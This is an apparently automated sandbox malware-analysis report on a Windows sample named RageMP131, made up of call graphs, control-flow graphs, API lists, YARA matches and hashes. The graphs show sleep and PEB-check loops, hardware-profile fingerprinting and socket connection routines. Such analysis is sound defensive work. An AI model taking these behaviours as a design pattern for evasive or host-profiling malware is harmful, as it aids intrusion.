18156 50e0b2b GetCurrentHwProfileW 18158 50e0b49 18156->18158 18157->18156 18157->18158 18159 323a40 18162 323a55 18159->18162 18160 323b28 GetPEB 18160->18162 18161 323a73 GetPEB 18161->18162 18162->18160 18162->18161 18163 323b9d Sleep 18162->18163 18164 323ae8 Sleep 18162->18164 18165 323bc7 18162->18165 18163->18162 18164->18162 18400 2ca210 18433 39f290 18400->18433 18402 2ca248 18438 2c2ae0 18402->18438 18404 2ca28b 18454 3a5362 18404->18454 18407 2ca377 18409 2ca34e 18409->18407 18483 3a47b0 18409->18483 18415 3a9136 4 API calls 18416 2ca2fc 18415->18416 18420 2ca318 18416->18420 18469 32cf60 18416->18469 18474 3adbdf 18420->18474 18435 2c21d0 Concurrency::cancel_current_task std::_Xinvalid_argument ___std_exception_copy std::_Facet_Register 18433->18435 18434 39f2af 18434->18402 18435->18434 18486 3a0651 18435->18486 18439 2c2ba5 18438->18439 18440 2c2af6 18438->18440 18504 2c2270 18439->18504 18444 2c2b02 std::locale::_Locimp::_Locimp 18440->18444 18445 2c2b2a 18440->18445 18447 2c2b6e 18440->18447 18448 2c2b65 18440->18448 18442 2c2baa 18514 2c21d0 18442->18514 18444->18404 18449 39f290 std::_Facet_Register RtlAllocateHeap 18445->18449 18446 2c2b3d 18450 3a47b0 RtlAllocateHeap 18446->18450 18453 2c2b46 std::locale::_Locimp::_Locimp 18446->18453 18452 39f290 std::_Facet_Register RtlAllocateHeap 18447->18452 18447->18453 18448->18442 18448->18445 18449->18446 18451 2c2bb4 18450->18451 18452->18453 18453->18404 18527 3a52a0 18454->18527 18456 2ca2d7 18456->18409 18457 3a9136 18456->18457 18458 3a9149 ___std_exception_copy 18457->18458 18551 3a8e8d 18458->18551 18460 3a915e 18461 3a44dc ___std_exception_copy RtlAllocateHeap 18460->18461 18462 2ca2ea 18461->18462 18463 3a4eeb 18462->18463 18464 3a4efe ___std_exception_copy 18463->18464 18577 3a4801 18464->18577 18466 3a4f0a 18467 3a44dc ___std_exception_copy RtlAllocateHeap 18466->18467 18468 2ca2f0 18467->18468 18468->18415 18470 32cfa7 18469->18470 18473 32cf78 __fread_nolock 18469->18473 18625 330560 18470->18625 18472 32cfba 18472->18420 18473->18420 18640 3adbfc 18474->18640 18476 2ca348 18477 3a8be8 18476->18477 18478 3a8bfb ___std_exception_copy 18477->18478 18758 3a8ac3 18478->18758 18480 3a8c07 18481 3a44dc ___std_exception_copy RtlAllocateHeap 18480->18481 18482 3a8c13 18481->18482 18482->18409 18484 3a46ec ___std_exception_copy RtlAllocateHeap 18483->18484 18485 3a47bf __Getctype 18484->18485 18488 3a065e ___std_exception_copy 18486->18488 18491 2c2213 18486->18491 18487 3a068b 18501 3ad7d6 18487->18501 18488->18487 18488->18491 18492 3b56b8 18488->18492 18491->18402 18493 3b56d4 18492->18493 18494 3b56c6 18492->18494 18495 3ad23f __dosmaperr RtlAllocateHeap 18493->18495 18494->18493 18499 3b56ec 18494->18499 18496 3b56dc 18495->18496 18497 3a47a0 ___std_exception_copy RtlAllocateHeap 18496->18497 18498 3b56e6 18497->18498 18498->18487 18499->18498 18500 3ad23f __dosmaperr RtlAllocateHeap 18499->18500 18500->18496 18502 3b6db3 ___std_exception_destroy RtlAllocateHeap 18501->18502 18503 3ad7ee 18502->18503 18503->18491 18518 39d6e9 18504->18518 18515 2c21de Concurrency::cancel_current_task std::_Xinvalid_argument 18514->18515 18516 3a0651 ___std_exception_copy RtlAllocateHeap 18515->18516 18517 2c2213 18516->18517 18517->18446 18521 39d4af 18518->18521 18520 39d6fa std::_Xinvalid_argument 18524 2c3010 18521->18524 18525 3a0651 ___std_exception_copy RtlAllocateHeap 18524->18525 18526 2c303d 18525->18526 18526->18520 18530 3a52ac __fread_nolock 18527->18530 18528 3a52b3 18529 3ad23f __dosmaperr RtlAllocateHeap 18528->18529 18531 3a52b8 18529->18531 18530->18528 18532 3a52d3 18530->18532 18535 3a47a0 ___std_exception_copy RtlAllocateHeap 18531->18535 18533 3a52d8 18532->18533 18534 3a52e5 18532->18534 18536 3ad23f __dosmaperr RtlAllocateHeap 18533->18536 18541 3b6688 18534->18541 18540 3a52c3 18535->18540 18536->18540 18538 3a52ee 18539 3ad23f __dosmaperr RtlAllocateHeap 18538->18539 18538->18540 18539->18540 18540->18456 18542 3b6694 __fread_nolock std::_Lockit::_Lockit 18541->18542 18545 3b672c 18542->18545 18544 3b66af 18544->18538 18548 3b674f __fread_nolock 18545->18548 18546 3b6795 __fread_nolock 18546->18544 18547 3b63f3 __Getctype RtlAllocateHeap 18549 3b67b0 18547->18549 18548->18546 18548->18547 18550 3b6db3 ___std_exception_destroy RtlAllocateHeap 18549->18550 18550->18546 18553 3a8e99 __fread_nolock 18551->18553 18552 3a8e9f 18554 3a4723 ___std_exception_copy RtlAllocateHeap 18552->18554 18553->18552 18555 3a8ee2 __fread_nolock 18553->18555 18557 3a8eba 18554->18557 18558 3a9010 18555->18558 18557->18460 18559 3a9023 18558->18559 18560 3a9036 18558->18560 18559->18557 18567 3a8f37 18560->18567 18562 3a90e7 18562->18557 18563 3a9059 18563->18562 18564 3a55d3 4 API calls 18563->18564 18565 3a9087 18564->18565 18566 3ae17d 2 API calls 18565->18566 18566->18562 18568 3a8fa0 18567->18568 18569 3a8f48 18567->18569 18568->18563 18569->18568 18571 3ae13d 18569->18571 18572 3ae151 ___std_exception_copy 18571->18572 18573 3ae05c __fread_nolock 2 API calls 18572->18573 18574 3ae166 18573->18574 18575 3a44dc ___std_exception_copy RtlAllocateHeap 18574->18575 18576 3ae175 18575->18576 18576->18568 18578 3a480d __fread_nolock 18577->18578 18579 3a4814 18578->18579 18580 3a4835 __fread_nolock 18578->18580 18581 3a4723 ___std_exception_copy RtlAllocateHeap 18579->18581 18584 3a4910 18580->18584 18583 3a482d 18581->18583 18583->18466 18587 3a4942 18584->18587 18586 3a4922 18586->18583 18588 3a4979 18587->18588 18589 3a4951 18587->18589 18591 3b5f82 __fread_nolock RtlAllocateHeap 18588->18591 18590 3a4723 ___std_exception_copy RtlAllocateHeap 18589->18590 18599 3a496c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18590->18599 18592 3a4982 18591->18592 18600 3ae11f 18592->18600 18595 3a4a2c 18603 3a4cae 18595->18603 18597 3a4a43 18597->18599 18611 3a4ae3 18597->18611 18599->18586 18618 3adf37 18600->18618 18602 3a49a0 18602->18595 18602->18597 18602->18599 18604 3a4cbd 18603->18604 18605 3b5f82 __fread_nolock RtlAllocateHeap 18604->18605 18606 3a4cd9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18605->18606 18607 3ae11f 2 API calls 18606->18607 18610 3a4ce5 _ValidateLocalCookies 18606->18610 18608 3a4d39 18607->18608 18609 3ae11f 2 API calls 18608->18609 18608->18610 18609->18610 18610->18599 18612 3b5f82 __fread_nolock RtlAllocateHeap 18611->18612 18613 3a4af6 18612->18613 18614 3a4b40 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18613->18614 18615 3ae11f 2 API calls 18613->18615 18614->18599 18616 3a4b9d 18615->18616 18616->18614 18617 3ae11f 2 API calls 18616->18617 18617->18614 18620 3adf43 __fread_nolock 18618->18620 18619 3adf4b 18619->18602 18620->18619 18621 3adf86 18620->18621 18623 3adfcc 18620->18623 18622 3a4723 ___std_exception_copy RtlAllocateHeap 18621->18622 18622->18619 18623->18619 18624 3ae05c __fread_nolock 2 API calls 18623->18624 18624->18619 18626 330585 18625->18626 18627 3306a9 18625->18627 18630 33059a 18626->18630 18632 3305e3 18626->18632 18633 3305f0 18626->18633 18628 2c2270 RtlAllocateHeap 18627->18628 18629 3306ae 18628->18629 18631 2c21d0 Concurrency::cancel_current_task RtlAllocateHeap 18629->18631 18634 39f290 std::_Facet_Register RtlAllocateHeap 18630->18634 18638 3305aa __fread_nolock std::locale::_Locimp::_Locimp 18631->18638 18632->18629 18632->18630 18637 39f290 std::_Facet_Register RtlAllocateHeap 18633->18637 18633->18638 18634->18638 18635 3a47b0 RtlAllocateHeap 18636 3306b8 18635->18636 18637->18638 18638->18635 18639 330667 __fread_nolock std::locale::_Locimp::_Locimp 18638->18639 18639->18472 18641 3adc08 __fread_nolock 18640->18641 18642 3adc1b __fread_nolock 18641->18642 18643 3adc52 __fread_nolock 18641->18643 18648 3adc40 __fread_nolock 18641->18648 18644 3ad23f __dosmaperr RtlAllocateHeap 18642->18644 18649 3ada06 18643->18649 18645 3adc35 18644->18645 18647 3a47a0 ___std_exception_copy RtlAllocateHeap 18645->18647 18647->18648 18648->18476 18652 3ada18 __fread_nolock 18649->18652 18655 3ada35 18649->18655 18650 3ada25 18651 3ad23f __dosmaperr RtlAllocateHeap 18650->18651 18653 3ada2a 18651->18653 18652->18650 18652->18655 18657 3ada76 __fread_nolock 18652->18657 18654 3a47a0 ___std_exception_copy RtlAllocateHeap 18653->18654 18654->18655 18655->18648 18656 3adba1 __fread_nolock 18660 3ad23f __dosmaperr RtlAllocateHeap 18656->18660 18657->18655 18657->18656 18659 3b5f82 __fread_nolock RtlAllocateHeap 18657->18659 18662 3b4623 18657->18662 18721 3a8a2b 18657->18721 18659->18657 18660->18653 18663 3b464d 18662->18663 18664 3b4635 18662->18664 18665 3b498f 18663->18665 18669 3b4690 18663->18669 18666 3ad22c __dosmaperr RtlAllocateHeap 18664->18666 18667 3ad22c __dosmaperr RtlAllocateHeap 18665->18667 18668 3b463a 18666->18668 18670 3b4994 18667->18670 18671 3ad23f __dosmaperr RtlAllocateHeap 18668->18671 18672 3b469b 18669->18672 18674 3b4642 18669->18674 18680 3b46cb 18669->18680 18673 3ad23f __dosmaperr RtlAllocateHeap 18670->18673 18671->18674 18675 3ad22c __dosmaperr RtlAllocateHeap 18672->18675 18676 3b46a8 18673->18676 18674->18657 18677 3b46a0 18675->18677 18679 3a47a0 ___std_exception_copy RtlAllocateHeap 18676->18679 18678 3ad23f __dosmaperr RtlAllocateHeap 18677->18678 18678->18676 18679->18674 18681 3b46e4 18680->18681 18682 3b471f 18680->18682 18683 3b46f1 18680->18683 18681->18683 18707 3b470d 18681->18707 18686 3b6e2d std::_Locinfo::_Locinfo_dtor 2 API calls 18682->18686 18684 3ad22c __dosmaperr RtlAllocateHeap 18683->18684 18685 3b46f6 18684->18685 18687 3ad23f __dosmaperr RtlAllocateHeap 18685->18687 18689 3b4730 18686->18689 18690 3b46fd 18687->18690 18688 3c0d44 __fread_nolock RtlAllocateHeap 18693 3b486b 18688->18693 18691 3b6db3 ___std_exception_destroy RtlAllocateHeap 18689->18691 18692 3a47a0 ___std_exception_copy RtlAllocateHeap 18690->18692 18694 3b4739 18691->18694 18720 3b4708 __fread_nolock 18692->18720 18695 3b48e3 ReadFile 18693->18695 18708 3b489b 18693->18708 18696 3b6db3 ___std_exception_destroy RtlAllocateHeap 18694->18696 18697 3b48fb 18695->18697 18698 3b4957 18695->18698 18699 3b4740 18696->18699 18697->18698 18702 3b48d4 18697->18702 18709 3b4964 18698->18709 18718 3b48b5 18698->18718 18700 3b474a 18699->18700 18701 3b4765 18699->18701 18703 3ad23f __dosmaperr RtlAllocateHeap 18700->18703 18705 3ae13d __fread_nolock 2 API calls 18701->18705 18712 3b4920 18702->18712 18713 3b4937 18702->18713 18702->18720 18706 3b474f 18703->18706 18704 3b6db3 ___std_exception_destroy RtlAllocateHeap 18704->18674 18705->18707 18710 3ad22c __dosmaperr RtlAllocateHeap 18706->18710 18707->18688 18708->18702 18708->18718 18711 3ad23f __dosmaperr RtlAllocateHeap 18709->18711 18710->18720 18715 3b4969 18711->18715 18740 3b4335 18712->18740 18713->18720 18750 3b417b 18713->18750 18719 3ad22c __dosmaperr RtlAllocateHeap 18715->18719 18718->18720 18735 3ad1e5 18718->18735 18719->18720 18720->18704 18722 3a8a3c 18721->18722 18731 3a8a38 std::locale::_Locimp::_Locimp 18721->18731 18723 3a8a43 18722->18723 18726 3a8a56 __fread_nolock 18722->18726 18724 3ad23f __dosmaperr RtlAllocateHeap 18723->18724 18725 3a8a48 18724->18725 18727 3a47a0 ___std_exception_copy RtlAllocateHeap 18725->18727 18728 3a8a8d 18726->18728 18729 3a8a84 18726->18729 18726->18731 18727->18731 18728->18731 18733 3ad23f __dosmaperr RtlAllocateHeap 18728->18733 18730 3ad23f __dosmaperr RtlAllocateHeap 18729->18730 18732 3a8a89 18730->18732 18731->18657 18734 3a47a0 ___std_exception_copy RtlAllocateHeap 18732->18734 18733->18732 18734->18731 18736 3ad22c __dosmaperr RtlAllocateHeap 18735->18736 18737 3ad1f0 __dosmaperr 18736->18737 18738 3ad23f __dosmaperr RtlAllocateHeap 18737->18738 18739 3ad203 18738->18739 18739->18720 18754 3b402e 18740->18754 18743 3b43d7 18747 3b4391 __fread_nolock 18743->18747 18748 3ae13d __fread_nolock 2 API calls 18743->18748 18744 3b43c7 18745 3ad23f __dosmaperr RtlAllocateHeap 18744->18745 18746 3b437d 18745->18746 18746->18720 18747->18746 18749 3ad1e5 __dosmaperr RtlAllocateHeap 18747->18749 18748->18747 18749->18746 18751 3b41b5 18750->18751 18752 3b4246 18751->18752 18753 3ae13d __fread_nolock 2 API calls 18751->18753 18752->18720 18753->18752 18755 3b4062 18754->18755 18756 3b40ce 18755->18756 18757 3ae13d __fread_nolock 2 API calls 18755->18757 18756->18743 18756->18744 18756->18746 18756->18747 18757->18756 18759 3a8acf __fread_nolock 18758->18759 18760 3a8ad9 18759->18760 18761 3a8afc __fread_nolock 18759->18761 18762 3a4723 ___std_exception_copy RtlAllocateHeap 18760->18762 18763 3a8af4 18761->18763 18765 3a8b5a 18761->18765 18762->18763 18763->18480 18766 3a8b67 18765->18766 18768 3a8b8a 18765->18768 18767 3a4723 ___std_exception_copy RtlAllocateHeap 18766->18767 18769 3a8b82 18767->18769 18768->18769 18770 3a55d3 4 API calls 18768->18770 18769->18763 18771 3a8ba2 18770->18771 18779 3b6ded 18771->18779 18774 3b5f82 __fread_nolock RtlAllocateHeap 18775 3a8bb6 18774->18775 18783 3b4a3f 18775->18783 18778 3b6db3 ___std_exception_destroy RtlAllocateHeap 18778->18769 18780 3b6e04 18779->18780 18782 3a8baa 18779->18782 18781 3b6db3 ___std_exception_destroy RtlAllocateHeap 18780->18781 18780->18782 18781->18782 18782->18774 18784 3b4a68 18783->18784 18787 3a8bbd 18783->18787 18785 3b4ab7 18784->18785 18788 3b4a8f 18784->18788 18786 3a4723 ___std_exception_copy RtlAllocateHeap 18785->18786 18786->18787 18787->18769 18787->18778 18790 3b49ae 18788->18790 18791 3b49ba __fread_nolock 18790->18791 18792 3b49f9 18791->18792 18794 3b4b12 18791->18794 18792->18787 18795 3ba6de __fread_nolock RtlAllocateHeap 18794->18795 18798 3b4b22 18795->18798 18796 3b4b28 18806 3ba64d 18796->18806 18798->18796 18799 3b4b5a 18798->18799 18800 3ba6de __fread_nolock RtlAllocateHeap 18798->18800 18799->18796 18801 3ba6de __fread_nolock RtlAllocateHeap 18799->18801 18802 3b4b51 18800->18802 18803 3b4b66 FindCloseChangeNotification 18801->18803 18804 3ba6de __fread_nolock RtlAllocateHeap 18802->18804 18803->18796 18804->18799 18805 3b4b80 __fread_nolock 18805->18792 18807 3ba65c 18806->18807 18808 3ad23f __dosmaperr RtlAllocateHeap 18807->18808 18810 3ba686 18807->18810 18809 3ba6c8 18808->18809 18811 3ad22c __dosmaperr RtlAllocateHeap 18809->18811 18810->18805 18811->18810

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 193 323a40-323a52 194 323a55-323a61 193->194 196 323a67-323a6d 194->196 197 323b28-323b31 GetPEB 194->197 196->197 199 323a73-323a7f GetPEB 196->199 198 323b34-323b48 197->198 200 323b4a-323b4f 198->200 201 323b99-323b9b 198->201 202 323a80-323a94 199->202 200->201 203 323b51-323b59 200->203 201->198 204 323a96-323a9b 202->204 205 323ae4-323ae6 202->205 207 323b60-323b73 203->207 204->205 206 323a9d-323aa3 204->206 205->202 210 323aa5-323ab8 206->210 208 323b92-323b97 207->208 209 323b75-323b88 207->209 208->201 208->207 209->209 211 323b8a-323b90 209->211 212 323aba 210->212 213 323add-323ae2 210->213 211->208 214 323b9d-323bc2 Sleep 211->214 215 323ac0-323ad3 212->215 213->205 213->210 214->194 215->215 216 323ad5-323adb 215->216 216->213 217 323ae8-323b0d Sleep 216->217 218 323b13-323b1a 217->218 218->197 219 323b1c-323b22 218->219 219->197 220 323bc7-323bd8 call 2c6bd0 219->220 223 323bda-323bdc 220->223 224 323bde 220->224 225 323be0-323bfd call 2c6bd0 223->225 224->225
                                  APIs
                                  • Sleep.KERNELBASE(000003E9,?,00000001,00000000,?,?,?,?,?,?,?,?,00323DB6), ref: 00323B08
                                  • Sleep.KERNELBASE(00000001,?,00000001,00000000,?,?,?,?,?,?,?,?,00323DB6), ref: 00323BBA
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 3474705ba0b5ded6ac0d7a181e8ab92046dac25ddf2e8eb16796a96b47921138
                                  • Instruction ID: 3625aa647ecdea9a6bf72388af7d0c9ff623ae441a64524262457d2ebefeec45
                                  • Opcode Fuzzy Hash: 3474705ba0b5ded6ac0d7a181e8ab92046dac25ddf2e8eb16796a96b47921138
                                  • Instruction Fuzzy Hash: AD51DB35A042298FCB26CF48D8D0EAAB7B5FF48704F2A45AAD445AF311D735EE05CB80

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 487 50e0a5d-50e0a64 488 50e0a66 487->488 489 50e0a45 487->489 492 50e0a68-50e0a6b 488->492 490 50e0a6d-50e0a72 489->490 491 50e0a47-50e0a48 489->491 493 50e0a76-50e0aaf 490->493 494 50e0aaa-50e0aaf 491->494 495 50e0a4a-50e0a58 491->495 492->493 498 50e0abd-50e0b0b 493->498 494->498 495->492 505 50e0b1c-50e0b39 GetCurrentHwProfileW 498->505 507 50e0b4e-50e0c0b call 50e0c23 505->507 517 50e0c0b call 50e0c23 507->517
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 050E0B2B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4154003797.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_50e0000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: e356178eeefc4597194558fc3d776a3a60dc8ae5721b4d64da1ea73fba789c1c
                                  • Instruction ID: ed50e365c4108a2014e8888872ff243e81a309b923afdb4ed422409aca9b2441
                                  • Opcode Fuzzy Hash: e356178eeefc4597194558fc3d776a3a60dc8ae5721b4d64da1ea73fba789c1c
                                  • Instruction Fuzzy Hash: 0121D4A660D119ADE242C2113E79AFE67AFF6DA7307388466F40BE2605D2D40A895131

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 2de0a0-2de0d2 WSAStartup 1 2de0d8-2de102 call 2c6bd0 * 2 0->1 2 2de1b7-2de1c0 0->2 7 2de10e-2de165 1->7 8 2de104-2de108 1->8 10 2de167-2de16d 7->10 11 2de1b1 7->11 8->2 8->7 12 2de16f 10->12 13 2de1c5-2de1cf 10->13 11->2 14 2de175-2de189 socket 12->14 13->11 19 2de1d1-2de1d9 13->19 14->11 15 2de18b-2de19b connect 14->15 17 2de19d-2de1a5 closesocket 15->17 18 2de1c1 15->18 17->14 20 2de1a7-2de1ab 17->20 18->13 20->11
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startupclosesocketconnectsocket
                                  • String ID:
                                  • API String ID: 3098855095-0
                                  • Opcode ID: 72c13cd8eccc0e5a51a749fd4154eb507656569d51edd7ba5db4a4780cc80463
                                  • Instruction ID: 2efa72ecf63d3668d59b70372f0ea50c8ca33f8dda6aa7789ebec43c6cb0755f
                                  • Opcode Fuzzy Hash: 72c13cd8eccc0e5a51a749fd4154eb507656569d51edd7ba5db4a4780cc80463
                                  • Instruction Fuzzy Hash: A831D4712153016BDB209F288848B2BB7E4EB86734F010F1EF9A8A62D0D335DD148BA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 21 39f290-39f293 22 39f2a2-39f2a5 call 3adf2c 21->22 24 39f2aa-39f2ad 22->24 25 39f2af-39f2b0 24->25 26 39f295-39f2a0 call 3b17d8 24->26 26->22 29 39f2b1-39f2b5 26->29 30 39f2bb 29->30 31 2c21d0-2c2220 call 2c21b0 call 3a0efb call 3a0651 29->31 30->30
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C220E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,
                                  • API String ID: 2659868963-131796292
                                  • Opcode ID: b98c0836f34af107737a736fb2a735cc9b8bd2b82c2110377a4073ac3ac69d35
                                  • Instruction ID: b57cb395a27a42587f7a4215873edfaa2b57a53ff93080de2b9c04a48af21253
                                  • Opcode Fuzzy Hash: b98c0836f34af107737a736fb2a735cc9b8bd2b82c2110377a4073ac3ac69d35
                                  • Instruction Fuzzy Hash: 8E012B7950030DAFCF1AAF98E802E9977ACDA01310B548539FA59DF991EB70E9548790

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 38 3a4942-3a494f 39 3a4979-3a498d call 3b5f82 38->39 40 3a4951-3a4974 call 3a4723 38->40 46 3a498f 39->46 47 3a4992-3a499b call 3ae11f 39->47 45 3a4ae0-3a4ae2 40->45 46->47 49 3a49a0-3a49af 47->49 50 3a49bf-3a49c8 49->50 51 3a49b1 49->51 54 3a49ca-3a49d7 50->54 55 3a49dc-3a4a10 50->55 52 3a4a89-3a4a8e 51->52 53 3a49b7-3a49b9 51->53 56 3a4ade-3a4adf 52->56 53->50 53->52 57 3a4adc 54->57 58 3a4a6d-3a4a79 55->58 59 3a4a12-3a4a1c 55->59 56->45 57->56 62 3a4a7b-3a4a82 58->62 63 3a4a90-3a4a93 58->63 60 3a4a1e-3a4a2a 59->60 61 3a4a43-3a4a4f 59->61 60->61 65 3a4a2c-3a4a3e call 3a4cae 60->65 61->63 66 3a4a51-3a4a6b call 3a4e59 61->66 62->52 64 3a4a96-3a4a9e 63->64 67 3a4ada 64->67 68 3a4aa0-3a4aa6 64->68 65->56 66->64 67->57 71 3a4aa8-3a4abc call 3a4ae3 68->71 72 3a4abe-3a4ac2 68->72 71->56 76 3a4ac4-3a4ad2 call 3c4a10 72->76 77 3a4ad5-3a4ad7 72->77 76->77 77->67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: O:
                                  • API String ID: 0-1127995068
                                  • Opcode ID: 8ed38200a054be15eb2fd55e798bacc87c6ec1d92598dd95a83dc30ca6f77a59
                                  • Instruction ID: 505034c5702062155f2dbba11dd310682df43c0c5f60d6e4eff5772046c36150
                                  • Opcode Fuzzy Hash: 8ed38200a054be15eb2fd55e798bacc87c6ec1d92598dd95a83dc30ca6f77a59
                                  • Instruction Fuzzy Hash: 2D51C970A00108AFDF16CF58CC45AAABFF5EF8A354F258158F8499B252D3B1DE51CB94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
